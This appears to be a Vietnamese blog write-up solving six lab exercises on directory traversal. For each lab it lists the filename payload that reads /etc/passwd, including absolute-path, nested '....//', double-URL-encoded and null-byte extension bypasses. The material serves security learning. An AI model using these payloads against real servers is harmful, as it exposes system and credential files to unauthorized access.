- Published on
Directory traversal
- Authors
- Name
- Kim Phu
1.File path traversal, simple case
- Bài này mở 1 cái ảnh bất kì, ta thấy có request link dạng
?filename=..thay đoạn sau thành?filename=../../../etc/passwd
2.File path traversal, traversal sequences blocked with absolute path bypass
- Bài này cũng mở 1 cái ảnh bất kì, ta thấy có request link dạng
?filename=..thay đoạn sau thành?filename=/etc/passwd
- Forward ở interception, tắt interception và reload nữa là solved rồi
3.File path traversal, traversal sequences stripped non-recursively
- Bài này cũng mở 1 cái ảnh bất kì, ta thấy có request link dạng
?filename=..thay đoạn sau thành?filename=....//....//....//etc/passwd - Forward ở interception nữa là solved rồi
4.File path traversal, traversal sequences stripped with superfluous URL-decode
- Bài này cũng mở 1 cái ảnh bất kì, ta thấy có request link dạng
?filename=..thay đoạn sau thành?filename=..%252f..%252f..%252fetc/passwd - Đây là encode url , có thể dùng Ctrl+U < mà thực ra bài này mình lấy payload cho sẵn :))) >
5.File path traversal, validation of start of path
- Lại mở 1 cái ảnh bất kì, ta thấy có request link dạng
image?filename=/var/www/images/10.jpgthay đoạn sau thànhimage?filename=/var/www/images/../../../etc/passwd - Forward ở interception nữa là solved rồi
6.File path traversal, validation of file extension with null byte bypass
- Lại mở 1 cái ảnh bất kì, ta thấy có request link.
- Theo tên đề bài, ta thấy phải để extension cuối để validate chứ không thể traveral như bình thường được.
- Thay payload thành
filename=../../../etc/passwd%00.png - ENter và boombs -> done